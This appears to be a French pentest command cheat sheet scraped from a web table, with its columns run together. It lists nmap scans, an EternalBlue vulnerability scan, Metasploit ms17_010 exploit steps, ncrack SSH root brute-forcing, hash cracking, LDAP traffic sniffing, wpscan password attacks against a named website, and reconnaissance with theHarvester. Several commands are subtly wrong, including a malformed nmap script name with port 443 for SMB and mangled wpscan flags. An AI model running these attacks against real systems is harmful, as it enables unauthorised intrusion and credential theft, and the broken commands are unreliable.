driftnetdriftnetAnalyse de paquets Afficher les images transmises
nmap -Pn -n -sS -p 22,25,80,443,8080 10.5.23.0/24nmapScanner de reseauxScan TCP (scan SYN = scan semi-ouvert)
nmap -n -sn -PR 10.5.23.0/24nmapScanner de reseauxScan hote ARP
ls /usr/share/nmap/scriptsnmapScripts NSEListe des scripts Nmap
nmap -n -Pn -p 443 --script smbvuln- ms17-010 10.5.23.0/24nmapScripts NSERechercher les hôtes vulnérables EternalBlue
shodan.io, censys.ioshodanScanner de reseauxBases de données publiques de scan Internet
ncrack -p 22 --user root -P ./passwords.txt 10.5.23.0/24ncrackDéchiffrement de mots de passe Essayez les mots de passe SSH à partir d'une liste de mots
searchsploit apachesearchsploitRecherche des exploitsRecherche des exploits pour "apache" (copie locale de l'Exploit-DB)
john hashes.txtJohn the RipperDéchiffrement de hashDéchiffrement d'un hash en utilisant John the Ripper
hashid 869d[...]bd88hashidDéchiffrement de hashIdentifier le type de hachage
hashcat --example-hasheshashcat Déchiffrement de hashAfficher des exemples de types de hachage pour hashcat
hashcat -m 5600 -a 0 hash.txt /path/to/wordlists/*hashcat Déchiffrement de hashDéchiffrement hashes par code-type (par exemple code 5600 pour le type NetNTLMv2)
msfconsolemétasploit - msfconsoleExploitation vulnérabilitésDémarrez Metasploit
> search eternalbluemétasploit - msfconsoleExploitation vulnérabilitésRecherche exploit
msf > use exploit/windows/smb/ms17_…métasploit - msfconsoleExploitation vulnérabilitésUtilisez exploit
curl ifconfig.mecurlLinux OSAfficher son ip publique
ngrep 'secret' port 389
ngrepAnalyse de paquets Rechercher le mot "secret" sur le trafic réseau, sur le port 389 (ldap) plus exactement
systemctl [start|restart|stop|status|enable|disable] ssh
sshServeur/Client SSH Méthode "Systemd" - Démarrer/arrêter/statuts SSH
service ssh [start|restart|stop|status]
sshServeur/Client SSH Méthode "service command" - Démarrer/arrêter/statuts SSH
/etc/init.d/ssh [start|restart|stop|status]
sshServeur/Client SSH Méthode "System V. Init scripts" - Démarrer/arrêter/statuts SSH
wpscan --url https://oksecu.com --passwords test-mdp.txt --url test-users.txt wpscanscanner de vulnérabilités WordPress
wpscan --url https://oksecu.com -P soleil123 t -U adminwpscanscanner de vulnérabilités WordPress
whatweb monsite.comwhatwebscan la structure d'un site webhttps://github.com/urbanadventurer/WhatWeb
netstat -lnp | grep LISTENnetstat + greplister les connexion en ECOUTELister vos connexions entrantes/sortantes
theharvester -d example.com -l 500 -b all -e admin@example.comtheharvesterRechercher des comptes de réseaux sociaux associés à une adresse e-mailCollecte informations
theharvesterCollecte informations

*Si l’affichage n’est pas optimal, passer en vue « version pour PC ».